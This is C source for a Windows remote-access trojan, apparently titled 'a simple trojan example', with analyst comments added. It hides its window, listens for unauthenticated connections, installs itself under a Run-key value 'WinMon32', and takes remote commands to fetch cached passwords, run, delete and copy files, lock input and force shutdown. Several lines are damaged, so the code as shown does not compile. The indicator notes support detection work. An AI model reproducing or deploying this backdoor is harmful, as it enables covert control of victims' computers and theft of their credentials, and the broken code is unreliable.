📄 一个简单木马例子.txt
case DRIVE_REMOTE:
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH);
wsprintf(szBuff,"NetWork Disk: %s (%s)\n\n\r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
}
}
}
//---------------------------------------------------------------------------
// ExitWin
// Shut down the computer (Win 9x, NT/2000)
//
// Reached from the "exitwin" command in ExeCommand, i.e. the shutdown is
// requested by the remote peer, not by the local user.
//  - Win9x platform: calls ExitWindowsEx(1,0) directly.
//  - NT platform: enables SE_SHUTDOWN_NAME on the process's own token and,
//    if AdjustTokenPrivileges reports success, calls
//    ExitWindowsEx(EWX_FORCE|EWX_POWEROFF,0).
// GetOS() is defined outside this excerpt.
// Analyst note: a background process enabling the shutdown privilege and then
// forcing a power-off with no user interaction is the observable behaviour.
//---------------------------------------------------------------------------
VOID WINAPI ExitWin()
{
DWORD dwVer;
HANDLE hProcess, hToken;
TOKEN_PRIVILEGES NewState;
DWORD ProcessId, ReturnLength = 0;
LUID luidPrivilegeLUID;
dwVer=GetOS();
if(dwVer==VER_PLATFORM_WIN32_WINDOWS)
// The literal 1 is the value of EWX_SHUTDOWN in the Windows headers.
ExitWindowsEx(1,0);
else if(dwVer==VER_PLATFORM_WIN32_NT)
{
// Open a handle to the current process, then its token.
// The results of these three calls are not checked, and hProcess/hToken
// are not closed anywhere in this function.
ProcessId = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES, &hToken);
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID);
// Request exactly one privilege (shutdown) in the enabled state.
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
ExitWindowsEx(EWX_FORCE|EWX_POWEROFF,0);
}
}
//---------------------------------------------------------------------------
// CtrlCD
// Optical-drive tray control.
//
// Ctrl==TRUE sends the MCI "door open" string, Ctrl==FALSE the "door closed"
// string; hWnd is passed to mciSendString as the callback window.
// Reached from the "opencd" / "closecd" commands in ExeCommand.
//---------------------------------------------------------------------------
VOID WINAPI CtrlCD(HWND hWnd,BOOL Ctrl)
{
    // Exact comparison with TRUE/FALSE: any other value makes no MCI call.
    if(Ctrl==TRUE)
    {
        mciSendString("Set cdaudio door open wait",NULL,0,hWnd);
    }
    else if(Ctrl==FALSE)
    {
        mciSendString("Set cdaudio door closed wait",NULL,0,hWnd);
    }
}
//---------------------------------------------------------------------------
// PopMsg
// Show a message box.
//
// Displays `message` in a modal MB_OK box owned by hWnd, with the fixed
// caption "PopMsg". Reached from the "popmsg" command in ExeCommand, so the
// text shown comes from the remote peer.
//---------------------------------------------------------------------------
VOID WINAPI PopMsg(LPCTSTR message,HWND hWnd)
{
    LPCTSTR szCaption="PopMsg";   // fixed window title of the box

    MessageBox(hWnd,message,szCaption,MB_OK);
}
//---------------------------------------------------------------------------
// ChangeDir
// Change the process's current directory.
//
// Returns TRUE when SetCurrentDirectory(szDir) succeeds, FALSE otherwise.
// Reached from the "cd" command in ExeCommand.
//---------------------------------------------------------------------------
BOOL WINAPI ChangeDir(LPCTSTR szDir)
{
    // Normalise the API's nonzero/zero result to exactly TRUE or FALSE.
    return SetCurrentDirectory(szDir) ? TRUE : FALSE;
}
//---------------------------------------------------------------------------
// GetCurPath
// Get the current directory
//
// Formats the process's current directory as "CurrentDirect: <path>\n\r" and
// sends it on the global socket NewSock (declared outside this excerpt).
// Reached from the "gcpath" command in ExeCommand.
// Analyst note: the "CurrentDirect: " prefix is a fixed string in the reply
// and can serve as a network or static indicator.
//---------------------------------------------------------------------------
VOID WINAPI GetCurPath()
{
TCHAR lpBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];
// Return value is not checked; lpBuff is used as-is below.
GetCurrentDirectory(MAX_PATH,lpBuff);
// NOTE(review): szTemp is MAX_PATH characters but receives the prefix plus a
// path of up to MAX_PATH-1 characters, so a long path does not fit.
wsprintf(szTemp,"CurrentDirect: %s\n\r",lpBuff);
send(NewSock,szTemp,lstrlen(szTemp),0);
}
//---------------------------------------------------------------------------
// HSSys
// Show or hide the desktop and the taskbar
//
// Ctrl==FALSE hides, Ctrl==TRUE shows, the windows found by class name.
// The hWnd parameter is overwritten by each FindWindow result, so the value
// passed in by the caller is never used.
// Reached from the "showsys" / "hidesys" commands in ExeCommand.
// NOTE(review): the second class-name literal ("Sh*ll _TrayWnd") looks
// altered by the hosting page; presumably it is the taskbar window class.
// FindWindow results are not checked before ShowWindow.
//---------------------------------------------------------------------------
VOID WINAPI HSSys(HWND hWnd,BOOL Ctrl)
{
switch(Ctrl)
{
case FALSE:
// Hide: "Progman" window first, then the second window class.
hWnd=FindWindow("Progman",NULL);
ShowWindow(hWnd,SW_HIDE);
hWnd=FindWindow("Sh*ll _TrayWnd",NULL);
ShowWindow(hWnd,SW_HIDE);
break;
case TRUE:
// Show: same two lookups with SW_SHOW.
hWnd=FindWindow("Progman",NULL);
ShowWindow(hWnd,SW_SHOW);
hWnd=FindWindow("Sh*ll _TrayWnd",NULL);
ShowWindow(hWnd,SW_SHOW);
break;
}
}
//---------------------------------------------------------------------------
// LockMK
// Lock the mouse and function keys
//
// Ctrl==TRUE applies the lock, Ctrl==FALSE releases it.
// Reached from the "lockmk" / "unlock" commands in ExeCommand.
// NOTE(review): SPI_SCREENSAVERRUNNING was commonly used on Win9x-era
// systems to suppress system key combinations, which matches the header's
// "function keys" -- confirm the effect on the target OS.
//---------------------------------------------------------------------------
VOID WINAPI LockMK(BOOL Ctrl)
{
RECT rc;
switch(Ctrl)
{
case TRUE:
// An all-zero RECT is passed to ClipCursor, i.e. the pointer is confined
// to an empty rectangle at the screen origin.
ZeroMemory(&rc,sizeof(rc));
ClipCursor(&rc);
SystemParametersInfo(SPI_SCREENSAVERRUNNING,TRUE,NULL,0);
SystemParametersInfo(SPI_SETFASTTASKSWITCH,TRUE,NULL,0);
break;
case FALSE:
// ClipCursor(NULL) removes the confinement; both flags are reset.
ClipCursor(NULL);
SystemParametersInfo(SPI_SCREENSAVERRUNNING,FALSE,NULL,0);
SystemParametersInfo(SPI_SETFASTTASKSWITCH,FALSE,NULL,0);
break;
}
}
//---------------------------------------------------------------------------
// ExeCommand
// Execute a command
//
// Dispatches one text command line (szCommand) to a handler and writes status
// text to the global socket NewSock. The only caller visible on this page is
// WndProc, which passes the buffer it assembled from bytes received on that
// socket, so every command word and argument here is chosen by the remote
// peer. hWnd is only forwarded to CtrlCD, HSSys and PopMsg.
//
// Exact-match commands (lstrcmp):
//   getpw, getinfo, gcpath, opencd, closecd, showsys, hidesys, lockmk,
//   unlock, dproc, exitwin
// Prefix-match commands (strncmp on the command word), taking arguments:
//   popmsg, execfile, cd, dir, del, copy, ren
// Anything else is answered with "Bad Command !!!".
// The branches are tested in the order written; because the second group is
// matched by prefix only, that order decides which handler a line reaches.
//
// GetCachePW, GetSysInfo, EnumProcess, LoadProcess, Dir, Delete, Copy and Ren
// are defined outside this excerpt.
//
// Analyst notes:
//  - The command words and the reply strings are fixed ASCII literals and can
//    be used as static or network indicators.
//  - Reply lengths passed to send() are hard-coded and do not always equal
//    the literal's length (e.g. 28 for the 22-character popmsg usage text),
//    so a reply can carry a trailing NUL or bytes past the literal.
//  - Arguments are copied with lstrcpy into Param1/Param2 (100 characters)
//    and szBuf (MAX_PATH) without any length check.
//  - NOTE(review): several lines below are damaged on this page (typographic
//    quotes, `szCommand` compared with a character, `szBuf=0;` assigning to
//    an array). As shown, this function does not compile.
//---------------------------------------------------------------------------
VOID ExeCommand(LPCTSTR szCommand,HWND hWnd)
{
TCHAR szBuf[MAX_PATH];
TCHAR Param1[100];
TCHAR Param2[100];
int i;
// --- Commands without arguments: whole-string comparison -------------------
if((lstrcmp(szCommand,"getpw"))==0)
GetCachePW();
else if((lstrcmp(szCommand,"getinfo"))==0)
GetSysInfo();
else if((lstrcmp(szCommand,"gcpath"))==0)
GetCurPath();
else if((lstrcmp(szCommand,"opencd"))==0)
CtrlCD(hWnd,TRUE);
else if((lstrcmp(szCommand,"closecd"))==0)
CtrlCD(hWnd,FALSE);
else if((lstrcmp(szCommand,"showsys"))==0)
HSSys(hWnd,TRUE);
else if((lstrcmp(szCommand,"hidesys"))==0)
HSSys(hWnd,FALSE);
else if((lstrcmp(szCommand,"lockmk"))==0)
LockMK(TRUE);
else if((lstrcmp(szCommand,"unlock"))==0)
LockMK(FALSE);
else if((lstrcmp(szCommand,"dproc"))==0)
EnumProcess();
else if((lstrcmp(szCommand,"exitwin"))==0)
ExitWin();
// --- Commands with arguments: prefix comparison on the command word --------
// Each branch below has the same shape: send a usage text if the line is too
// short, scan the text after the command word, then copy the argument(s).
else if((strncmp(szCommand,"popmsg",lstrlen("popmsg")))==0)
{
if(lstrlen(szCommand)<=lstrlen("popmsg")+2)
{
// No return after the usage text: control continues into the scan below.
send(NewSock,"usage : popmsg Message",28,0);
}
for(i=lstrlen("popmsg")+1;i<lstrlen(szCommand);i++)
// NOTE(review): damaged line (see header); the same line recurs in every
// argument-taking branch of this function.
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
// Scan reached the end of the line: everything after the command word is
// treated as one argument.
lstrcpy(Param1,szCommand+lstrlen("popmsg")+1);
PopMsg(Param1,hWnd);
}
}
else if((strncmp(szCommand,"execfile",lstrlen("execfile")))==0)
{
if(lstrlen(szCommand)<=lstrlen("execfile")+2)
{
send(NewSock,"usage : execfile szFileName",28,0);
}
for(i=lstrlen("execfile")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
// The argument is handed to LoadProcess (outside this excerpt); the reply
// reports its BOOL result.
lstrcpy(Param1,szCommand+lstrlen("execfile")+1);
if(LoadProcess(Param1)==FALSE)
send(NewSock,"execfile Fail",14,0);
else
send(NewSock,"execfile OK",11,0);
}
}
else if((strncmp(szCommand,"cd",lstrlen("cd")))==0)
{
if(lstrlen(szCommand)<=lstrlen("cd")+2)
{
send(NewSock,"cd Drive\\Directory",19,0);
}
for(i=lstrlen("cd")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("cd")+1);
if(ChangeDir(Param1)==FALSE)
send(NewSock,"Change Directory Fail",21,0);
else
send(NewSock,"Change Directory OK",19,0);
}
}
else if((strncmp(szCommand,"dir",lstrlen("dir")))==0)
{
if(lstrlen(szCommand)<=lstrlen("dir")+2)
{
// Short line: list with the default pattern instead of sending a usage text.
Dir("*.*");
}
for(i=lstrlen("dir")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("dir")+1);
Dir(Param1);
}
}
else if((strncmp(szCommand,"del",lstrlen("del")))==0)
{
if(lstrlen(szCommand)<=lstrlen("del")+2)
{
send(NewSock,"usage : DEL szFileName",28,0);
}
for(i=lstrlen("del")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("del")+1);
Delete(Param1);
}
}
// --- Two-argument commands: these two branches return after the usage text -
else if((strncmp(szCommand,"copy",lstrlen("copy")))==0)
{
if(lstrlen(szCommand)<=lstrlen("COPY")+2)
{
send(NewSock,"usage : COPY Drive\\Filename ",28,0);
return;
}
for(i=lstrlen("copy")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
// Only one argument found: nothing is copied, a hint text is sent instead.
lstrcpy(Param1,szCommand+lstrlen("copy")+1);
lstrcpy(Param2,"");
send(NewSock,"Copy File1 to File2",19,0);
}
else
{
// Two arguments: work on a local copy of the line, then take the text
// after the command word and the text after position i.
lstrcpy(szBuf,szCommand);
// NOTE(review): damaged line (see header); szBuf is an array.
szBuf=0;
lstrcpy(Param1,szBuf+lstrlen("copy")+1);
lstrcpy(Param2,szBuf+i+1);
Copy(Param1,Param2);
}
}
else if((strncmp(szCommand,"ren",lstrlen("ren")))==0)
{
if(lstrlen(szCommand)<=lstrlen("ren")+2)
{
send(NewSock,"usage : REN Drive\\Filename ",28,0);
return;
}
for(i=lstrlen("ren")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘ ‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("ren")+1);
lstrcpy(Param2,"");
send(NewSock,"Ren File1 to File2",19,0);
}
else
{
lstrcpy(szBuf,szCommand);
szBuf=0;
lstrcpy(Param1,szBuf+lstrlen("ren")+1);
lstrcpy(Param2,szBuf+i+1);
Ren(Param1,Param2);
}
}
else
send(NewSock,"Bad Command !!!",16,0);
}
//---------------------------------------------------------------------------
// InitSocket
// Initialise the socket
//
// Starts Winsock, creates a TCP socket, binds it to PORT on INADDR_ANY (all
// local interfaces), puts it into listening state with a backlog of 3, and
// asks Winsock to post WM_SOCKET to hWnd for FD_ACCEPT / FD_CLOSE events.
// Returns TRUE on success; on any failure it shows a message box, closes the
// socket where one exists, and returns FALSE.
// dwVersion, wsaData, CreateSock, Sock_in, dwFlag, addrlen, PORT and
// WM_SOCKET are declared outside this excerpt; the port number is therefore
// not visible here.
// Analyst note: the host-side indicator is a TCP listener on all interfaces
// owned by a process whose only window is hidden (see WinMain).
//--------------------------------------------------------------------------
BOOL WINAPI InitSocket(HWND hWnd)
{
if((WSAStartup(dwVersion,&wsaData))!=0)
{
MessageBox(hWnd,"INIT SOCKET ERROR",NULL,MB_OK);
return FALSE;
}
CreateSock=socket(AF_INET,SOCK_STREAM,0);
if(CreateSock==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"SOCKET ERROR",NULL,MB_OK);
return FALSE;
}
// Listening address: IPv4, PORT in network byte order, any local interface.
Sock_in.sin_family=AF_INET;
Sock_in.sin_port=htons(PORT);
Sock_in.sin_addr.S_un.S_addr=htonl(INADDR_ANY);
// SO_REUSEADDR is set from dwFlag; the setsockopt result is not checked.
setsockopt(CreateSock,SOL_SOCKET,SO_REUSEADDR,(LPSTR)&dwFlag,sizeof(dwFlag));
if(bind(CreateSock,(LPSOCKADDR)&Sock_in,sizeof(Sock_in))==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"BIND ERROR",NULL,MB_OK);
return FALSE;
}
else if(listen(CreateSock,3)==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"LISTEN ERROR",NULL,MB_OK);
return FALSE;
}
// Socket events are delivered as WM_SOCKET window messages to WndProc.
else if(WSAAsyncSelect(CreateSock,hWnd,WM_SOCKET,FD_ACCEPT|FD_CLOSE)==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"WSASelect ERROR",NULL,MB_OK);
return FALSE;
}
// Length argument later passed to accept() in WndProc.
addrlen=sizeof(SOCKADDR_IN);
return TRUE;
}
//---------------------------------------------------------------------------
// WndProc
// Window procedure of the hidden window; doubles as the socket event loop.
//
// WM_SOCKET carries the Winsock event in lParam and the socket in wParam:
//   FD_ACCEPT - accept the connection into the global NewSock and send a
//               banner followed by PROMPT.
//   FD_READ   - read up to dwComm bytes; a leading carriage return runs the
//               accumulated line through ExeCommand, anything else is
//               appended to the line buffer. The received data is echoed.
//   FD_CLOSE  - close the socket.
// WM_DESTROY calls HideProc(UNSERVICE_PROC) and ends the message loop.
// dwComm, PROMPT, HideProc and the socket globals are declared outside this
// excerpt.
//
// Analyst notes:
//  - Nothing between accept() and ExeCommand() checks who the peer is: any
//    host that can reach the listening port gets the prompt and the full
//    command set.
//  - The banner "LANLAN Ver 1.0 Write by VIRUS" is sent on every connection
//    and is a stable network indicator.
//  - NewSock is a single global; a later connection replaces the earlier one.
//  - recv() results are not checked, and lstrcat() appends to szExec with no
//    length limit, so the peer controls how much is written into that buffer.
//---------------------------------------------------------------------------
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
// szCommand: scratch buffer for the latest receive and for outgoing text.
// szExec: command line accumulated across receives until a carriage return.
static TCHAR szCommand[dwComm];
static TCHAR szExec[dwComm];
switch(message)
{
case WM_SOCKET:
if(WSAGETSELECTERROR(lParam))
{
closesocket(wParam);
break;
}
switch(WSAGETSELECTEVENT(lParam))
{
// Incoming connection
case FD_ACCEPT:
NewSock=accept(CreateSock,(LPSOCKADDR)&NewSock_in,&addrlen);
WSAAsyncSelect(NewSock,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE);
wsprintf(szCommand,"LANLAN Ver 1.0 Write by VIRUS\n\n\r%s",PROMPT);
// The whole dwComm-sized buffer is sent, not just the formatted text.
send(NewSock,szCommand,dwComm,0);
break;
// Read input; a carriage return executes the command,
// anything else is appended to the command buffer.
case FD_READ:
ZeroMemory(szCommand,dwComm);
recv(NewSock,szCommand,dwComm,0);
// VK_RETURN is 0x0D, i.e. a carriage return as the first received byte.
if(szCommand[0]==VK_RETURN)
{
wsprintf(szCommand,"\n\n\r%s",PROMPT);
send(NewSock,szCommand,dwComm,0);
ExeCommand(szExec,hWnd);
ZeroMemory(szExec,dwComm);
}
else
lstrcat(szExec,szCommand);
// Not part of the else: this send runs on both paths (echo / second prompt).
send(NewSock,szCommand,dwComm,0);
break;
case FD_CLOSE:
closesocket(wParam);
break;
}
break;
case WM_DESTROY:
// NOTE(review): presumably undoes the HideProc(SERVICE_PROC) call made in
// WinMain -- confirm against HideProc's definition.
HideProc(UNSERVICE_PROC);
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}
//---------------------------------------------------------------------------
// WinMain
// Program entry point: hidden window, listener start-up, self-installation.
//
// Sequence, as written:
//  1. Register window class "LANLAN" and create a window titled
//     "LANLANServer", which is immediately set to SW_HIDE.
//  2. On the Win9x platform call HideProc(SERVICE_PROC) (defined outside this
//     excerpt; presumably hides the process from the task list -- confirm).
//  3. InitSocket(hWnd) starts the TCP listener; its result is ignored.
//  4. Copy the running executable to <system directory> + RUN (RUN is a
//     constant defined outside this excerpt) and write that path as value
//     "WinMon32" under
//     HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
//  5. Run the message loop that drives WndProc.
//
// Indicators visible in this function, for detection and clean-up:
//  - window class "LANLAN" / window title "LANLANServer", never shown;
//  - a copy of the executable written into the system directory;
//  - Run-key value name "WinMon32" pointing at that copy.
//---------------------------------------------------------------------------
WINAPI WinMain(HINSTANCE hInstance, HINSTANCE, LPSTR, int)
{
HWND hWnd;
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="LANLAN";
HKEY hKey=0;
DWORD disp=0;
LONG lResult;
TCHAR szKey[MAX_PATH];
TCHAR szSysDir[MAX_PATH+25];
TCHAR szFileName[MAX_PATH];
// Plain window class; WndProc receives both window and socket messages.
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=hInstance;
wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
wndc.hCursor=LoadCursor(NULL,IDC_ARROW);
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);
hWnd=CreateWindow(szAppName,"LANLANServer",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,hInstance,NULL);
// The window exists only as a message target and is never made visible.
ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);
if(GetOS()==VER_PLATFORM_WIN32_WINDOWS)
{
HideProc(SERVICE_PROC);
}
InitSocket(hWnd);
// Copy the file to the system directory
// and register it in the registry so that it starts automatically.
GetSystemDirectory(szSysDir,MAX_PATH);
lstrcat(szSysDir,RUN);
GetModuleFileName(NULL,szFileName,MAX_PATH);
// bFailIfExists is FALSE: an existing file at the target path is overwritten.
CopyFile(szFileName,szSysDir,FALSE);
lstrcpy(szKey,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
// NOTE(review): REG_OPTION_VOLATILE is requested, but the Run key normally
// already exists, in which case the call opens the existing key -- confirm
// on the target OS.
lResult=RegCreateKeyEx(HKEY_LOCAL_MACHINE,szKey,0,NULL,REG_OPTION_VOLATILE,
KEY_ALL_ACCESS,NULL,&hKey,&disp);
if(lResult==ERROR_SUCCESS)
{
// Value name "WinMon32", data = path of the copy made above.
lResult=RegSetValueEx(hKey,"WinMon32",0,REG_SZ,szSysDir,lstrlen(szSysDir));
RegCloseKey(hKey);
}
// Standard message pump; socket events arrive here as WM_SOCKET.
while(GetMessage(&msg,NULL,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return (msg.wParam);
}